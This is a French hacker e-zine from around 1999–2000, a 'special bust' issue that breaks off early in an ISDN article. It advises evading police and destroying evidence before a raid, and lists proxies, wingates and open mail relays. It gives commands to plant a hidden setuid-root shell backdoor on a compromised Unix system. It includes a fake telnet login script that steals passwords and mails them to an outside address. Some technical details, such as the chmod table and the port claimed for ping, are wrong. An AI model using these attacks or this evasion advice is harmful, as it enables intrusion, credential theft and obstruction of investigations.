3D13 - numero 5
FRI DI PHEURTINE
3d13@usa.net
ICQ#38328109
http://www.3d13.grp.8m.com
merci a cataclysm pour le logo (3d13.jpg) et la page web
------------------------------------------------------------------------------
                                   1999
                                  ISSUE #5
                                SPECIAL BUST
------------------------------------------------------------------------------
nerdman - weblaura
"No guts, no glory."

INTRODUCTION :

   !! FREE KEVIN !! Enfin, il est libre, mercredi 26 janvier 2000, vous
trouverez ci-joint avec cet e-zine quelques photos de lui, quel comique ;-)
Si cet e-zine sort un peu plus tard que les fois d'avant, c'est parce que
j'ai beaucoup recherche a vous fournir un e-zine de qualite et donc remis
toute sa conception en question. Il vous plait ou pas ? dites-le moi.
C'est pour cela que vous aurez de moins en moins de trucs comme le carding
ou comme le cracking (il y en avait deja pas beaucoup).

Aussi, je vous informe de la creation d'un ensemble de meetings qui se
derouleront un peu partout dans la france et pour pouvoir en organiser un,
ecrivez moi et je mettrait le lieu sur mon site web, et les villes dans les
prochains numeros de 3d13, vous devrez me preciser le lieu exact dans la 
ville ainsi que l'heure. Pourquoi je souhaites faire cela ? uniquement pour
relancer l'underground en France qui est vraiment perdue si on ne fait rien
donc aggissez, n'attendez pas que les autres le fasse car les autres : c'est
VOUS. Ces reunion auront lieu le premier lundi de chaque mois : cela permettra
aux etudiants-internes de pouvoir venir nous rejoindre car les reunions du
groupe 2600 (qui sont mondiales) se deroulent le vendredi. Donc j'attends vos
demandes.

A noter que cet e-zine est "special bust", dedie a tout mes amis qui sont a 
l'ombre en ce moment a cause de leur curiosite.

Il n'y a (a part l'assembleur), rien qur la programmation, mais ca reviendra
en force sur le 6.


DISQUE-LAMER :

eeeeuuuhhh....
LISEZ PAS, MAIS DE TOUTE FACON DANS CET E-ZINE IL N'Y A RIEN D'ILLEGAL ET 
SIMPLEMENT DE L'INFORMATION INFORMATIVE POUR INFORMER LES GENS.
Sinon, vous etes entierement responsables de vos actes et je sais pas pourquoi
je dis ca.
Si tu lis cette ligne c'est que tu regarde un ecran et que tu n'est pas 
analphabete (c'est deja pas trop mal).

------------------------------------------------------------------------------
La meilleure citation du jour :

 " Si ils viennent chez vous ils prendront tout votre  materiel informatique
   et vous  montreront  surement  des photos plutot  comprometentes de vous,
   ensuite ils vous engageront surement comme  pion pour que vous infiltriez
   la scene undergrond et que vous puissiez leur donner des informations sur
   ceux qu'ils recherchent  et  quand ils  auront assez d'informations  pour
   chopper les types qu'ils recherchent, ils  vous chopperons  et ils diront
   que vous etiez avec eux et que c'est  vous  qui les avez denonces et vous
   serez juges avec eux !!!!! Y'a comme  une impression  de s'etre fait bien
   baise!!! "

                                                                        HITCHY
------------------------------------------------------------------------------
Ah, au fait, j'ai enleve la notation (utilisee dans l'issue 4) car je ne vois
pas pourquoi un article serait plutot reserve a l'elite qu'a un autre : il 
suffit d'etre passionne par ce sujet

                                  SOMMAIRE
        __
       / /  1....   Comment ne pas se faire buster           .... HITCHY 
      / /   2....   Maman y'a la DST qui frappe a la porte!! .... HITCHY
     / /    3....   La creation d'un backdoor                .... 3D13
    / /     4....   Obtenir un mot de passe facilement       .... 3D13
   / /      5....   Introduction a l'assembleur (partie 2)   .... PiroxMan
  / /       6....   Les utilitaires TCP/IP                   .... 3D13
 / /        7....   X.25                                     .... 3D13
| |         8....   Le RNIS / ISDN                           .... 3D13
 \ \        9....   Detail d'une attaque a partir d'unix     .... 3D13 
  \ \      10....   Les commandes ftp                        .... 3D13
   \ \     11....   Comment s'est passe notre dernier meeting.... 3D13
    \ \    12....   Les 10 commandements du hacker           .... Digital Squad
     \ \   13....   Academies et serveurs sous IIS           .... Clad Strife
      \ \  14....   New admin unix networking                .... CIT
       \_\ 15....   Le mot 2 la faim                         .... 3D13
 
                           -.                       .-
                       _..-'(                       )`-.._
                    ./'. '||\\.       (\_/)       .//||` .`\.
                 ./'.|'.'||||\\|..    )o o(    ..|//||||`.`|.`\.
              ./'..|'.|| |||||\`````` '`"'` ''''''/||||| ||.`|..`\.
            ./'.||'.|||| ||||||||||||.     .|||||||||||| ||||.`||.`\.
           /'|||'.|||||| ||||||||||||{     }|||||||||||| ||||||.`|||`\
          '.|||'.||||||| ||||||||||||{     }|||||||||||| |||||||.`|||.`
         '.||| ||||||||| |/'   ``\||``     ''||/''   `\| ||||||||| |||.`
         |/' \./'     `\./         \!|\   /|!/         \./'     `\./ `\|
         V    V         V          }' `\ /' `{          V         V    V
         `    `         `               V               '         '    '

LES SITES QUI DISTRIBUENT CE MAGAZINE :
http://www.madchat.org
http://cybz.unixlover.com
http://www.ifrance.com/ezines
http://www.multimania.com/nohack
http://4aic.cjb.net
...si j'en oublie, ecrivez moi.

LES HACKERS
Les hackers sont, contrairement aux crackers, tres respectueux envers les
autres (sauf pour les lamerz) et aiment plus que tout les systemes 
d'exploitation et cela n'a pas d'importance si il y en a 4 qui tournent sur
le meme machine.

LES CRACKERS
Craquent un site dans le but d'obtenir de l'argent ou de voler des infos et
se prennent pour "hackers"

LES LAMERZ
Se prennent pour des hackers, et meme mieux : pour des Elites.

    ------------------------------------------
    ----- Comment ne pas se faire buster -----
    ----------------------------------------1-

Cet article est plus pour les newbies, bon je vais ici parler du bust car
quand on hack que l'on crack ou que l'on fait du prheaking on pense jamais
a ce qui pourrait nous arriver car on se justifie toujours en ce disant que
c'est pour le fun que l'on fait ca. Je veux pas vous foutre les boules, mais
il faut quand meme realiser que le bust est bien existant! La regle absolue a
respecter ne jamais donner d'informations personnelle sur le net car comme
vous ne connaissez pas la personne a qui vous ecrivez qui est-ce qui ne vous
dit que ce n'est pas un pion ou que des organismes soit disant officiel ne
s'interresent pas a lui??????

  Voici juste un petit apercu des organismes officiels de securite en france:

  SEFTI : Service d'Enquete des Fraudes aux Technologies de l'Information 
  BCRCI : Brigade Centrale de Repression de la Criminalite Informatique 
  IRCGN : Institut de Recherches Criminelles de la Gendarmerie Nationale 
  SCSSI : Service Central de la Securite des Systemes d'Information 
  DSSI : Directoire de la Securite des Systemes d'Information 
  DISSI : Delegation Interministerielle pour la Securite des Systemes
  d'Information 
  SGDN : Secretariat General de la Defense Nationale 
  CISSI : Commission Interministerielle pour la Securite des Systemes
  d'Information 
  DSTI : Direction des Systemes Terrestres et d'Information 
  DST : Direction de la Surveillance du Territoire 
  GIC : Groupement Interministeriel de Controle 
  IHESI : Institut des hautes etudes de la securite interieure 
  DGCCRF : Direction Generale de la Concurrence, de la Consommation et de la
  Repression des Fraudes 
  DCRG : Direction Centrale des Renseignements Generaux 
  DGSE : Direction Generale de la Securite Exterieure 
  DG13 : Direction Generale chargee des telecoms et de la securite
         informatique
  (DG 13)   [Nd 3d13 : 3DG13 ;-) j'ai failli m'appeler comme ca 8-P ]
  DSN : Direction de la Surete Nationale
  CLUSIF : Club de la Securite informatique des systemes dinformation
           francais
  CIGREF : Club Informatique des GRandes Entreprises Francaises 

Bon vous voyez que c'est pas tres rejouissant. Dans cet liste celle qui est la
plus active c'est la DST on peut dire que c'est a eux que vous aurez a faire
si vous vous faites buster. Vous avez deja vu Enemi d'etat? et bien la DST
c'est un peu pres la meme chose, ils ont des hackers, beaucoup de monde qui
peuvent passer tout leur temps a epier tout vos faits et gestes, si un seul
jour il leur vient l'envie de vous chopper ne vous inquiter pas, ils vous
retrouveront facilement, si ils viennent chez vous ils prendront tout votre
materiel informatique et vous montreront surement des photos plutot
comprometentes de vous, ensuite ils vous engageront surement comme pion pour
que vous infiltriez la scene undergrond et que vous puissiez leur donner des
informations sur ceux qu'ils recherchent et quand ils auronts assez
d'informations pour chopper les types qu'ils recherchent, ils vous chopperons
et ils diront que vous etiez avec eux et que c'est vous qui les avez denonces
et vous serez jugees avec eux !!!!! Y'a comme une impression de s'etre fait
bien baise!!!
On va voir comment ils arrivent a vous retrouver:
D'abord quand vous envoyez un mail depuis votre messsagerie vous n'etes
absolument pas anonyme car votre adrresse IP apparait clairement et si ils
veulent vous retracez ils ont beaucoup de possibilites. Si vous allez
directement sur votre messagerie depuis votre fournisseur d'acces ils leur
suffira juste de voir les log de votre fournisseur d'acces pour vous retrouvez
mais encore la si vous avez donner de fausse information lors de votre
abonemment ca leur compliquera les choses mais la prochaine fois que vous vous
connecterez ils vous auront a coup sur donc dans ceux cas la il vous faut
changer de provider, sinon la technique consiste a passer par un proxy
different a chaque fois que vous vous connectez.
Maintenant si vous allez sur IRC sachez que certain channel son truffes de
pion de la DST et que tout ce que vous tappe est logge donc la il faut
toujours spooffer son IP ,si possible choisir un autre nick et faire attention
a qui on parle. [Nd 3d13 : et encore...]
En faites on peut dire qu'ils peuvent sniffer partout et donc espionner tout ce
que vous faites!
Donc quand vous etes sur le web essayer au maximum de cacher votre identite en
passant par des services anonymiseurs, des proxys, des wingates.......
Il ne faut jamais parler de ce que vous faites a votre entourage car un jour
ou l'autre quelqu'un vous balencera! 
Autre moyen: Si vous participez a des reunions publics comme celle du 2600 il
prendront des belles photos de vous et vous feront un jolie dossier. Donc le
mieux est d'eviter ce genre de runion car vous avez beaucoup de chance de
parler a un gas de la DST que vous prenez pour un hacker, mais si vous voulez
vraiment y aller alors metamorphoser vous le plus possible pour qu'on ne
puisse pas vous reconnaitre.
Ils peuvent aussi vous mettres sur ecoutes et la c'est vraiment pas bon car
sans faire expres il y a surememt quelqu'un qui lachera un truc pas tres
legal et cette information servira de preuve!
  Les regles qu'il faut toujours se rappeller:
  - Ne donne jamais ton identite a quelqu'un que tu ne connais pas 
    [ND 3d13 : et meme que tu connais ]         
  - Underground pour le fun et non pour l'argent
  - Ne garde jamais les noms et les adresses des personnes que tu connais 
  - Fais toi un email sur une messagerie gratuit et n'utilise jamais celle de
  ton provider
  - Si tu as un doute change de nick et d'email
  - Ne prends pas un nom comme thebesthacker@hotmail.com
  - Mfie toi de hotmail (kro$oft) et des trucs louches
  - Soit un peu parano
  - Ne parle jamais de ce que tu fais a ton entourage 
  - Essaille toujours un max de masquer ton identite
  - Ne leve jamais la tete (Enemi d'etat)
  - Si une personne vient verifier la teneur en calcaire de ta douche mefie
  toi!!!
  - Le telephone n'est absolument pas anonyme
  - Si le cryptage est autorise jusqu'a 128 bits c'est tout simplement que au
  dessus de 128 bits ils ont du mal a dechiffrer donc ne crois pas que le
  cryptage est la solution ultime, mais tu peux inventer ta propre methode de
  cryptage.
  - Ne jamais se venter d'un hack 
  - N'accepte pas les cookies
  - H/P/V/C/A rulez....... 

  Un petite liste de proxy:

  proxy1.emirates.net.ae port 8080 
  ns.eel.co.jp port 1080 
  proxy.indo.net.id port 8080 
  proxy.emirates.net.ae port 8080 
  164.58.14.114 port unknown
  134.206.1.114 port 3128 
  134.206.1.114 port 3128
  192.268.200.3 port 80 
  -567.public.rwc.webtv.net port 1213 
  proxy-567.public.rwc.webtv.net port 1213 
  ls-uranus.mmedia.is port 8080
  proxy.concept.net.sa port 8080 
  209.185.180.232 port 8080 
  212.142.12.100 port 1080
  proxy.kyit.edu.tw port 3128 
  proxy.ozemail.com.au port 8080 
  proxy.suhuf.net.sa port 8080 
  212.142.12.45 port 8080 
  proxy.stc.com.sa port 8080 
  proxy.highlandpark.k12.tx.us port 8080 
  203.12.6.161 port 80 
  203.12.6.160 port 80 
  203.12.6.6 port 80 
  brsh1.carol.net port 1080 
  proxy.webfront.net.au port 80 
  cache-web.grenet.fr port 80
  mail.wingsink.com port 8080 
  192.268.200.3 port 80 
  190.268.200.3 port 80 

  Des wingates:

  205.230.60.56
  203.243.123.14
  207.242.80.66
  207.236.55.231
  206.132.179.167
  thunder.jpl.nasa.gov
  24.226.156.21
  Telezimex.ro
  rs.internic.net
  202.21.8.21
  ts1-32.gcc.cyberhighway.net
  dns.yoshinomasa.co.jp
  P62.ASC-MB05.QZN.SKYINET.NET
  P59.ASC-MB05.QZN.SKYINET.NET
  ts1-32.gcc.cyberhighway.net
  200.210.15.178
  ts1-32.gcc.cyberhighway.net
  Telezimex.Ro 
  P62.ASC-MB05.QZN.SKYINET.NET
  P61.ASC-MB05.QZN.SKYINET.NET
  P60.ASC-MB05.QZN.SKYINET.NET 
  P59.ASC-MB05.QZN.SKYINET.NET 
  P58.ASC-MB05.QZN.SKYINET.NET 
  P57.ASC-MB05.QZN.SKYINET.NET 
  P56.ASC-MB05.QZN.SKYINET.NET 
  P55.ASC-MB05.QZN.SKYINET.NET 
  P54.ASC-MB05.QZN.SKYINET.NET 
  P53.ASC-MB05.QZN.SKYINET.NET 
  PPP-187-45.bng.vsnl.net.in 
  cableweb.w3.to 
  ultra.multiweb.nl 

  Des SMTP:

  mail.start.com.au 
  mail.vestelnet.com
  205.149.115.147 
  bareed.ayna.com 
  youthnet.org 
  inext.ro 
  iccnet.icc.net.sa 
  mail.eexi.gr 
  mail.dnt.ro 
  mail.compuserve.com
  pg.net.my 
  scholar.cc.emory.edu 
  imail.young-world.com
  mail.cut.org
  205.244.102.167
  relay.cyber.net.pk
  mail.lanalyst.nl
  mail.lig.bellsouth.net
  batelco.com.bh
  ns1.infonet-dev.co.jp
  inext.ro
  siamail.sia.it


  Longue vie a l'underground francophone!



    ----------------------------------------------------
    ----- Maman y'a la DST qui frappe a la porte!! -----
    --------------------------------------------------2-

Vous avez la DST ou tout autre saloperie du genre qui frappe a votre porte bon
alors la premiere chose que vous faites c'est de prendre un programme comme
shredder ou BCwipe ce sont des programmes qui remettent les clusters de votre
disque dur a 0 car vous etes censes savoir que quand vous effacez un fichier
il est toujours present sur le disque dur il sera efface quand quelque chose
viendra reecrire dessus donc meme si vous le formater ils pouront voir ce
qu'il y avait dessus, bon si vous voulez garder certaines donnees il faut
prealablement les cacher dans un fichier ou on pourra pas venir les chercher
le mieux est de zipper vos donnees surtout si ce sont des repertoires et de
leur donner une extension qui permettra de les dissimuler et vous les graver
ou les mettez sur une disquette que vous cacherez parce que vous pouvez dire
au revoir a votre superbe ordinateur et tous vos CD et disquettes. Bon
maintenons que nous avons dissimules les preuves analogiques il faut
dissimuler les preuves materielles par exemple si vous avez un telephone qui
se termine par 2 pinces crocos sur le rouge et le vert avec des bout de
plastiques blanc et gris ;-) ou encore des tones de zines imprimes, des CD
graves ou bien quelque chose que vous avez carde, vous prenez tout ca et vous
les mettez dans un sac a dos, 2 solutions si vous habitez dans un immeuble
faite bien attention qu'il n'y est pas d'inspecteur dehors et jeter votre sac
le plus loin possible, si vous etes dans une maison la aussi faite gaffe
qu'il ne puisse pas vous voir de dehors et balancer ca tres loin. Bon
maintenant allez ouvrir la porte a ces messieurs, bon il vont vous pousser,
foutre le souk, vous emmerder avec pleins de questions a la con et ils vont
surement essayer de vous faire chanter donc la pas de panique soyez relax de
toute facon ils n'auront aucune preuve venant de chez vous. Voyez de quoi ils
vous accuse et essayer de vous en sortir comme vous pouvez enfaites desfois
il est preferable de dire que l'on a rien a voir a cette histoire mais desfois
il faut mieux plus ou moins avouer donc a vous de voir!
Si il vous montre des photos plutot compromettante de vous demandez qu'il en
fasse un poster pour votre chambre, que vous aimeriez bien que les 2 premieres
soient tirees en triple pour vous et NE SIGNER JAMAIS une feuille sans l'avoir
lu 20 fois et l'avoir compris.
Bon voila j'espere que ce texte vous donnera des idees sur comment se proteger
un max en cas de bust. 
[ ND 3d13 : au pire, faites vous passez pour fou, car dans tout pays
            democratique, un fou n'est pas juge (bon apres... l'asile) ]



    -------------------------------------
    ----- La creation d'un backdoor -----
    -----------------------------------3-

La creation d'un backdoor

Vous etes arrive a penetrer un systeme informatique ? c'est bien ...
alors maintenant, je vais vous expliquer la creation d'un petit backdoor tout
bete comme choux, il s'appelle : le faux-utilisateur ou "the user-fake".
Cela montrera au newbie que hacker n'est pas si difficile que cela. Mais
n'apprendra stictement rien a un pro.
D'abord, je vais vous expliquer ce qu'est un backdoor et pourquoi il est
important d'en faire un.
Ensuite, je vais vous parler d'un commande Unix importante : chmod et d'autres
que vous etes cense deja connaitre ou alors c'est le moment ou jamais :
useradd, passwd, cp.
Enfin, je vais vous expliquer comment combler cette faille archie connue mais
que vous dever securiser a tout prix.


  1) Le backdoor : definition, utilisation

back = derriere
door = porte

il s'agit d'une expression qui est utilise par les hackers qui prennent
possession d'un systeme informatique et qui veulent revenir apres sans avoir
a refaire tout le travail qu'il ont deja fait ou pour indiquer a leurs amis
qu'ils peuvent maintenant y aller par un moyen facile.

Le premier backdoor que nous allons voir ne requiere pas de connaitre un
langage de programmation mais certainnes commandes unix, c'est surtout pour
vous montrer que hacker n'est pas reserve aux boss de l'info.
Il y a de multiples backdoor, un trojan est un exemple de backdoor.
Vous pouvez faire un backdoor facile comme celui presente dans le cadre de cet
article ou un backdoor complexe (comme par exemple une modification de kernel)


  2) Les commandes Unix a connaitre

        a. chmod

  syntaxe : chmod droits fichier [+autres fichiers ...]

chmod permet de definir des droits sur des fichiers ou repertoires.

les droits sont definis sur le tableau suivant :

|-- Proprietaire --|-- Groupe --|-- Reste du monde --|
|    r    w    x   |   r  w  x  |       r w x        |
|    r    w    x   |   r  w  x  |       r w x        |
|   700  200  100  |   70 20 10 |       7 2 1        |
|------------------|------------|--------------------|

r = read  = lecture
w = write = ecriture
x = eXec  = execution

par exemple, pour n'autoriser l'acces au repertoire que du proprietaire, il
faut faire : chmode 700 repertoire
Vous pouvez aussi faire des combinaisons :
pour liberer l'acces uniquement en lecture et execution a un groupe, et
laisser tous les droits au proprietaire, tapez : chmod 760 fichier/rep

Mais la commande chmod n'est pas que cela, mais ce n'est pas le but de cet
article de ne parler que de cette commande.

        b. useradd

Il s'agit d'un commande permettant de definir un nouvel utilisateur.
La commande useradd possede un tas d'options, que vous pouvez definir a
souhait, comme par exemple avoir un utilisateur limite dans le temps.
le plus simple est de taper : useradd nom
pour creer un nouvel utilisateur.

        c. passwd

La commande passwd permet de definir un mot de passe pour un utilisateur,
pour cela, tapez : passwd nom
puis tapez le mot de passe voulu.

        d. cp

Permet de copier un fichier : cp source destination


  3) le backdoor

Un fois que vous avez eu l'access au root, tapez le commandes suivantes :

useradd ghost
passwd ghost
   New password : 3d13
   Retype passwd: 3d13
cp /bin/sh /users/ghost
chmod 4777 /users/ghost/sh
mv /users/ghost/sh /users/ghost/.backdoor

ahahah, vous devez vous demander ce que fait ce 4 devant tous ces 777.
Tous ces 777, vous connaissez car on la vu dans la commande chmod.
Le 4 devant signifie seulement le Set-User-ID-Bit (appel system)
4000 = Set-User-ID-Bit
2000 = Set-Group-ID-Bit
1000 = Sticky-Bit
vous voyez que ce backdoor est tres simple.

Aussi, la commande mv permet de deplacer/renommer un fichier et le 
point mis devant est volontaire, c'est un fichier cache Unix.

  4) Comment securiser ?

Etant donne que ce n'est pas une faille, vous pouvez limiter le nombre
d'utilisateurs ou etablir un script qui compte le nombre d'utilisateur comme
ca, des que vous avez un nouvel utilisteur qui se cree, vous savez que vous
etes attaque ( et donc il ne vous reste plus qu'a savoir qui vous accede a
l'aide d'un petit nbstat ).
Mais bon, si l'utilisateur en est arrive la, c'est que vous n'etes pas un
tres bon admin', envoyez moi votre DNS que je rigole un peu avec vous!


    ----------------------------------------------
    ----- Obtenir un mot de passe facilement -----
    --------------------------------------------4-

  Vous avez deja vu les scripts dans les precedent numeros, relisez les en
cas d'amnesie partielle. Ce type de programme vous servira dans un endroit
ou vous avez acces a des machines et ou l'utilisateur change constamment.
On va donc initier une fausse session telnet.
voici la source
--- couper ici
#!/bin/sh

#******************************************************************************
#  (C) 3d13.grp 1999
#  3d13.grp@usa.net
#  www.3d13.grp.8m.com
#  Nom du programme : telnet
#  Auteur           : 3d13
#  Date             : 30/01/2000
#  OS               : Unix, linux et compatibles
#  Commentaires     : Ce programme permet de recuperer un mot de passe de
#                     facon tres "lame" mais efficace tout de meme.
#                     Concerne principalement les universites.
#                     ATTENTION : $PATH doit etre modifie de sorte a ne plus
#                     avoir acces a telnet (/etc/profile) mais a ce code
#*******************************************************************************

echo "Trying $1..." echo "Connected to $1." echo "Escape caractere is \'^]\'."
echo ""
echo "Linux 2.2.13" #Ici votre kernel
echo ""
echo "$1 login"
read ID
echo "password: "
read PW
echo "Login incorrect."
echo "Login $ID Password $PD" |mail 3d13@usa.net #Votre e-mail ici bien sur :)
rm $0          # Kill programme
kill -9 $PPID  # Kill procesus
--- couper ici
                                                                          3D13


                 ͻ
                      introduction a l'assembleur      
                 ͹
                             par PYROxMAN              
                  5 

Comme certain d'entre vous me l'on demande, j'ai decide de recidiver et de
vous proposer un deuxieme article de programmation assembleur. si vous n'avez
pas pu lire mon fameux article du precedent numero, telechargez 3d13#4.

Au dernier numero, nous avons vu la methode que nous allions utiliser pour 
apprendre ce fameux langage, donc, comme promis, aujourd'hui, nous allons voir
une nouvelle fonction et quelques commandes utiles.

TEST DE PRESENCE DE LA SOURIS :

        push es
        xor ax,ax
        mov es,ax
        mov bx,33h*4
        mov eax,dword ptr es:[bx]
        pop es
        cmp eax,0
        je no_mouse

        xor ax,ax int 33h
        cmp ax,0ffffh
        jne no_mouse
        ...
no_mouse:
        ...

Vous pouvez inclure dans no_mouse un message, avec la fonction que nous avons
vu au precedent numero, qui vous informe que la souris est absente.

QUELQUES COMMANDES :

MOV             MOV operande1,operande2         transfert le contenu du
                                                second operande dans le
                                                premier.
PUSH            PUSH operande                   sauve sur la pile la valeur
                                                de l'operande.
POP             POP operande                    extrait les derniers 16 bits
                                                de la pile, suivant ce mot
                                                dans l'operande specifie.
RET             RET                             provoque le retour au 
                                                programme principal marquant
                                                ainsi la fin d'une sous 
                                                routine.


C'est tout pour aujourd'hui, HE OUI SEULEMENT, je suis desole de ne pas en 
mettre plus, mais il faut bien que je travaille et que je garde de quoi
nourir les prochains numeros. SALUT
                                                PYROxMAN

    ----------------------------------
    ----- Les utilitaires TCP/IP -----
    --------------------------------6-

  Ce sont eux qui vous permettent d'obtenir des infos sur un site de maniere
plus ou moins interessante. Ils peuvent se subdiviser dans les categories
suivantes :
        *   Utilitaires de connection
        *   Utilitaires Internet
        *   Utilitaires de transfert de fichier et d'acces
        *   Utilitaires d'acces distant

Note : Je ne tiens pas a expliquer en detail chacun de ces utilitaires, je ne
vous montre qu'un apercu non-exhaustif. Sinon on pourrait en ecrire long.
Dans cet e-zine, pour ce numero au moins, nous ne verrons que les utilitaires
de connection. A vous de les utiliser a bon escient.

Utilitaires de connection

 Les utilitaires de connection sont les suivants :
     *   ARP
     *   Hostname
     *   IPConfig
     *   NBTStat
     *   Netstat
     *   Net Use/View
     *   Network Monitor
     *   Ping
     *   Route
     *   TraceRoute

        a) ARP
    ARP signifie Address Resolution Protocol. C'est lui qui vous trouve
l'adresse physique correspondant a une adresse IP.
Il vous permet d'afficher le contenu de la memoire cache d'une machine.
il possede de parametres qui peuvent etre connus en invoquant la commande
'arp --help'.

        b) Hostname
    Cette commande n'a aucune option ni aucun parametre a fixer. Il s'agit
seulement d'un utilitaire qui affiche le nom d'hote de la machine locale.

        c) IPConfig
    C'est le synonyme de WinIPCfg (en GUI bien sur) sous Windows 32 bits
[Nd : GUI = Graphic User Interface, Interface Utilisateur Graphique].
Ce programme affiche les parametres TCP/IP de la machine (avec entre autres
l'adresse IP statique et/ou dynamique affichee).
Une adresse IP statique est une adresse qui n'est pas allouee dynamiquement,
c'est a dire une adresse qui reste toujours la meme (ex. : 153.24.54.123),
tandis qu'un adresse IP dynamique vous est attribuee mais change tout le temps
apres chaque nouvelle reconnection (selon la norme IPv4).
IPConfig vous permet de verifier si l'adresse IP que vous avez choisie est
utilisable ou non (si les bits de poids fort, a gauche, sont a 0 pour la
classe A, 10 pour la classe B, 110 pour la classe C, 1110 pour la classe D..,
afin de ne pas creer des adresses IP non valides, mais c'est encore peut-etre
un peu complique).
Lorsque l'on execute IPConfig, il nous donne par defaut l'IP, le masque de
sous reseau et la passerelle par defaut.
Il possede cependant une option qui peut etre : ipconfig /all, pour obtenir
des infos sur votre serveur DNS, nom d'hote, et d'autres...

        d) NBTStat
    NBTStat signifie NetBIOS over TCP/IP statistics.
Il founit des statistique sur NetBIOS. Il possede les options suivantes :

nbtstat -A xxx.xxx.xxx.xxx : Affiche la tables des couples nom-adresse
physique d'une autre machine designee par son adresse IP.
nbtstat -c : affiche le contenu de la cache des noms NetBIOS (liens entre les
noms NetBIOS et adresse ID) vous indiquant avec quelles machines la votre
est rentree en communication dernierement.
nbtstat -n : affiche les services attribues a la machine
nbtstat -S xxx.xxx.xxx.xxx :  Affiche la tables de connections d'une autre
machine designee par son IP.

Il y a d'autres options que vous pouvez decouvrir grace a l'aide.

        e) Netstat
    Netstat donne des informations sur les protocoles TCP, UDP, IP et ICMP.
Il etablit principalement les diverses anomalies produites lors du transport
ainsi que les datagrammes emis et recus, les sockets ouverts y sont bien
sur listes. Il possede aussi des options dont la plus interessante est
netstat -a, car il indique les connections actives. Les autres ne sont que
des options orientees depannage reseau.

        f) Net Use/View
    net use et net view on pour mission de verifier les connection qu'il y
a avec netbios entre plusieurs machines. Ils se connectent sur un point 
partage (ou share point) et permettent de voir ou d'etablir la connection
avec ces share point.
NetView affiche le point de partage d'un serveur.
NetUse etablit ou stoppe la connection sur un share point.

        g) Network Monitor
Utilitaire de windows NT, il permet d'effectuer un espionnage dans les
paquets/datagrammes qui circulents sur le reseau.

        h) Ping
    Ping permet de determiner si l'hote local peut echanger des paquets
avec un autre hote (local ou distant). Il envoie ses datagrammes sur le
port 7, qui est echo. Cet utilitaire est vraiment beaucoup utilise.
Un ping vous indique une TTL (Time To Live), c'est tout simplement le
nombre de routeurs par lequel il passe avant d'etre supprime.    

        i) Route
   route vous permet de voir la table de routage IP du noyau. Route
permet simplement de modifier les entrees de ces tables.

        j) TraceRoute
    traceroute permet de suivre le chemin des paquets sur le reseau.
Depuis leur source jusqu'a leur destination. Il faut aussi savoir
que traceroute n'est pas une commande pour l'impatient, c'est une
commande qui est treeeeeeeees lente.


    ----------------
    ----- X.25 -----
    --------------7-

Attention, c'est tres technique mais vraiment tres interessant. Je tiens
juste a dire que ce n'est pas moi qui ait ecrit ce texte a l'origine, mais
une universite qui m'a permis de passer sur une autre universite.
La faille etait que la premiere utilisait IIS 4.0 (merci).

  C'est le nom d'un reseau fonctionnant au moyen de :
    - modem
    - coffret d'essai
    - armoire de brassage
    - commutateur de paquet
    - routeur

Son histoire debute au debut des annees 1980, il s'agit a l'origine 
d'un reseau de transport de donnes, ce reseau est assez "lourd", 
mais maintenant, c'est un reseau qui fonctionne tres bien et qui est
maitrise

LA COUCHE RESEAU

Cette couche permet d'etablir, maintenir des connections reseau entre deux
systemes et de donner les moyens necessaires pour echanger des unites de
service

Dans la couche reseau il subsiste 3 niveaux :


- Niveau 1 : niveau physique

Elle fournit les moyens mecaniques, electriques et fonctionnels necessaires a
l'activation , au maintien des connexions physiques destinees a la
transmission des bits entre entites de liaisons.

- Niveau 2 : HDLC (paquets)
H.D.L.C. signifie High Data Link Control, ce protocole etablie une liaison de
donnees entre deux E.T.T.D.
C'est lui qui se charge d'etablir les moyens fonctionnels pour etablir,
maintenir et liberer des connexions de liaisons de donnees.
L'E.T.T.D. appelant envoie une S.A.B.M.(Commande de mise en mode asynchrone
equilibre) ;
l'E.T.T.D. distant doit repondre par une U.A. (accuse de reception),
etablissant ainsi la connection.

- Niveau 3 : circuit virtuel

La couche reseau se charge d'acheminer une information d'entite reseau jusqu'a
un reseau distant (remote).

Verification du fonctionnement

Les reseaux peuvent etre analyses sans problemes.
l'analyseur de protocole indiquera les SABM envoyees et les UA recus; par
exemple s'il ne recoit pas d'UA c'est qu'il y a certainement un probleme de
niveau 1 (niveau physique) entre la zone ou ce trouve l'analyseur de protocole e
t la zone appelee distante. Il est tout de meme possible que deux, voir
plusieurs trames soit lancees de suite, cela s'appelle des fenetre
d'anticipation, ces meme trames sont numerotees.

Mais il existe sur l'analyseur de protocole, un systeme simple pour verifier
si la ligne est bonne ; ce systeme s'appelle Test Bert : Il envoie une
sequence de bits, ce qui compose l'emission et la reception.

Grace a un terminal asynchrone, branche sur le commutateur de paquet sur sa
ligne asynchrone (precise sur la documentation du meme appareil), il est
possible d'etablir une liaison avec une zone distante.

La manipulation consiste a taper l'adresse de la zone avec laquelle la liaison
doit s'etablir :
  Ex: - 90001099D10CC
          - 9000 correspond au DNIC = Identification du reseau
                                      privee.
          - 10 correspond a ZO = C'est l'identification du MCX (de
                                 la zone).
          - 99 correspond a l'AB = Numero d'abonne pour toutes les
                                   fonctions d'exploitation.
          - D correspond au separateur de donnees.
          - 10 correspond au numero SI.
          - CC correspond au mot de passe defini dans la
                              configuration par defaut.

                               

Il est possible de choisir la configuration ISE ou ITO :
- ISE permet de ne pas declarer de ligne et donc de changer la configuration
selectivement.
                                                                                     permet

La reinitialisation total des douze lignes du commutateur de paquets.

 

Le terminal propose ensuite de selectionner un numero de classe, chaque
numero a sa specification.

Ex: - Classe 1 : Identification de la configuration  elle nous informe
                 sur le nom de la configuration, l'identification du client
                 et la date de modification de la configuration.

    - Classe 12 & 13 : Permet de parametrer la ligne en synchrone ou
                       asynchrone

    - Classe 9 : Fonction routage : Entrer la valeur permettant le routage
                 des communications entre abonnes
                   Ex: 3,3,0,1,4

                        -1er chiffre: Type de routage (dans l'exemple:3 =
                                      routage sur 3 lignes).
                        -2eme chiffre: Nombre de ligne sur lesquelles l'appel
                                       peut etre route.
                        -3eme chiffre: Compteur = parametre systeme mis a
                                       jour par le logiciel
                                       (valeur 0 par convention)
                        -4eme chiffres: Numero des lignes sur lesquels
                                        l'appel peut etre route (dans
                                        l'exemple: la ligne 1 & 4)

                               

    --------------------------
    ----- Le RNIS / ISDN -----
    ------------------------8-

  RNIS est le sigle de Reseau Numerique a Integration de Services.
  ISDN pour Integrated Services Digital Network (dans la langue de Billou)

La difference numerique/analogique :
        votre voix est analogique, votre PC ne traite exclusivement que du
numerique (votre carte son n'est qu'un convertisseur numerique/analogique).
Numerique = 10110011 etc...
